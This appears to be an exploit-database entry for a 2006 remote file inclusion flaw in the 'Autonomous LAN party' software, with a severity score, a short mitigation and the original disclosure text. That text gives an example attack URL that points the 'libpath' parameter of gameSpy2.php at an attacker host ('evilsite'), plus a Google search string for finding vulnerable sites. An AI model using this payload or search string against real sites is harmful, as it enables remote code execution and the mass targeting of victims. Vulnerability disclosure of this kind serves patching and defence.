header-logo
Suggest Exploit
vendor:
by:
Codexploder
7.5
CVSS
HIGH
File Inclusion
98
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

Autonomous LAN party File iNclusion

The vulnerability allows an attacker to include files from a remote server, potentially leading to remote code execution or information disclosure.

Mitigation:

The vulnerability can be mitigated by properly sanitizing user input and using secure file inclusion techniques.
Source

Exploit-DB raw data:

Autonomous LAN party File iNclusion 

--------------------------------------------
Site:http://www.nerdclub.net/alp/
Demo:http://www.redfiles.net/cup/credits.php

--------------------------------------------
Example:

http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite

---------------------------------------------
Credit:Codexploder'tq
Mail  :codexploder@linuxmail.org
site  :www.biyo.tk www.biyosecurity.be

---------------------------------------------
Google:

intitle:"Autonomous LAN party"

--------------------------------------------
Source:

http://liz0zim.no-ip.org/alp.txt
http://www.blogcu.com/Liz0ziM/431845/

# milw0rm.com [2006-04-09]

Navigation

Suggest Exploit

Services By CQR